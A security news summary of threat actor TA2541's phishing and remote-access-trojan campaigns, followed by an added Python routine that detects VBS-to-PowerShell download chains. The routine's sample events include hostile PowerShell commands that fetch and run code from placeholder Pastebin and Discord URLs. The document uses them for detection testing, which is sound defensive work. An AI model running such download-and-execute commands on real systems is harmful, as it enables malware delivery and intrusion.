"Researchers Discover Common Threat Actor TA2541 Behind Aviation and Defense Malware Campaigns"

Security researchers at Proofpoint discovered a common threat actor behind attacks reported by Microsoft, Cisco Talos, and others. The individual or group, dubbed TA2541, has been attacking targets in the aviation, aerospace, transportation, and defense industries with Remote Access Trojans (RATs) since 2017. Its malware campaigns have impacted organizations globally, with recurring targets in North America, Europe, and the Middle East. In addition to COVID-19-themed phishing emails, TA2541 has used emails requesting quotes for aeronautical parts, ambulatory flights, and other specific components in the course of targeting organizations. In past campaigns, TA2541 used files containing malicious scripts that download malware, but its more recent campaigns have been using a Google Drive URL that takes the victim to an obfuscated Visual Basic Script (VBS) file. Once the VBS file is executed, PowerShell pulls an executable from a text file hosted on sites such as Pastebin. The executable then uses PowerShell to get into Windows processes, collects information, attempts to disable security software, and then downloads the RAT. TA2541 has also been observed using Discord URLs that link to compressed files, which download either AgentTesla or Imminent Monitor. Like other phishing campaigns, TA2541's techniques depend on human error. Therefore, it is essential to train people to recognize suspicious emails and messages, and to implement proper anti-phishing security tools. This article continues to discuss the tactics, techniques, procedures, and targets of TA2541, and how to avoid falling victim to its campaigns.
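As an added example (not from the article or from Proofpoint's own tooling), the following detection routine runs over constructed Sysmon-style process-creation records and flags the chain described above: a script host (wscript/cscript) spawning PowerShell that fetches content from Pastebin, Google Drive or Discord. The hostnames, the sample event tuples and the rule names are assumptions; real telemetry would come from EDR or Sysmon Event ID 1.

```python
import re
from dataclasses import dataclass

# Constructed sample events (parent image, child image, child command line).
# These are illustrative, not real telemetry; the URLs are placeholders.
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\wscript.exe",
     'wscript.exe "C:\\Users\\u\\Downloads\\Request_for_quote.vbs"'),
    ("C:\\Windows\\System32\\wscript.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('https://pastebin.com/raw/PLACEHOLDER')\""),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -File C:\\scripts\\inventory.ps1"),  # benign admin script
    ("C:\\Windows\\System32\\cscript.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -c \"Start-Sleep 1\""),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -c \"iwr https://cdn.discordapp.com/attachments/PLACEHOLDER/quote.zip\""),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Hosting services named in the article; domain names are assumptions.
STAGING_HOSTS = ("pastebin.com", "drive.google.com", "discordapp.com", "discord.com")
DOWNLOAD_PATTERN = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b", re.I)

@dataclass
class Alert:
    rule: str
    command_line: str

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return one Alert per event matching the VBS -> PowerShell -> paste-site chain."""
    alerts = []
    for parent, child, cmdline in events:
        parent_name, child_name = basename(parent), basename(child)
        hits_host = any(h in cmdline.lower() for h in STAGING_HOSTS)
        if parent_name in SCRIPT_HOSTS and child_name == "powershell.exe":
            # A script host launching PowerShell is rare in most fleets; escalate
            # when the command line also fetches from a staging site.
            rule = "vbs_to_powershell_download" if (hits_host or DOWNLOAD_PATTERN.search(cmdline)) \
                else "vbs_to_powershell"
            alerts.append(Alert(rule, cmdline))
        elif child_name == "powershell.exe" and hits_host:
            alerts.append(Alert("powershell_staging_site_fetch", cmdline))
    return alerts

def run_sample():
    return [a.rule for a in detect(SAMPLE_EVENTS)]
```

The lower-severity `vbs_to_powershell` rule is deliberately kept so that a dropper whose download stage is obfuscated beyond the keyword list still surfaces for review.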

TechRepublic reports "Researchers Discover Common Threat Actor TA2541 Behind Aviation and Defense Malware Campaigns"
